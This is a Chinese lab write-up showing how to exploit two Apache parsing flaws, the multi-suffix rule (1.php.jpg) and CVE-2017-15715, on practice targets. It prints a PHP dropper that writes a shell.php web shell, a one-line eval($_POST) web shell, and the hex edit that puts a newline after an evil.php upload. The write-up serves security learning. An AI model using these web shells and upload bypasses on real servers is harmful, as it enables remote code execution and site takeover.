Vulnhub靶场Apache解析漏洞

一.apache_parsing

原理:Apache HTTPD ⽀持⼀个⽂件拥有多个后缀,并为不同后缀执⾏不同的指令。在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析,就再往左判断。如 1.php.xxxxx

打开靶场

创建一个名为1.php.jpg的文件,内容输入

复制代码
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

上传。。。

他会生成一个内容是<?php eval($_POST["cmd"]);?>名为shell.php的文件

我们拼接网址访问

测试是否上传成功

二.CVE-2017-15715

原理:Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全策略。

影响版本:2.4.0~2.4.29

进入靶场

创建一个内容为<?php @eval($_POST['a']); ?>名为1.jpg的文件

上传,抓包

在evil.php⽂件后⾯添加空格

在到HEX中找到evil.php的那一行,把20改成0a

放行,访问evil.php%0a

写入成功!!!

相关推荐
Rover.x2 小时前
head table is mandatory
java·apache
小白勇闯网安圈2 小时前
supersqli、web2、fileclude、Web_python_template_injection
python·网络安全·web
白帽子黑客罗哥3 小时前
零基础转行渗透测试 系统的学习流程(非常详细)
学习·网络安全·渗透测试·漏洞挖掘·护网行动
介一安全3 小时前
【Frida Android】实战篇13:企业常用非对称加密场景 Hook 教程
android·网络安全·逆向·安全性测试·frida
Suckerbin4 小时前
Gaara: 1靶场渗透
安全·web安全·网络安全
小白勇闯网安圈5 小时前
Training-WWW-Robots、command_execution、baby_web、xff_referer
网络安全·web
小白勇闯网安圈8 小时前
unserialize3、php_rce、Web_php_include、warmup、NewsCenter
sql·网络安全·web
SelectDB9 小时前
面向 Agent 的高并发分析:Doris vs. Snowflake vs. ClickHouse
数据库·apache·agent
bleach-9 小时前
buuctf系列解题思路祥讲--[ZJCTF 2019]NiZhuanSiWei1——文件包含漏洞和伪协议的利用
安全·web安全·网络安全·php
bleach-10 小时前
文件描述符及Linux下利用反弹shell的各种方法
linux·websocket·web安全·网络安全·系统安全·信息与通信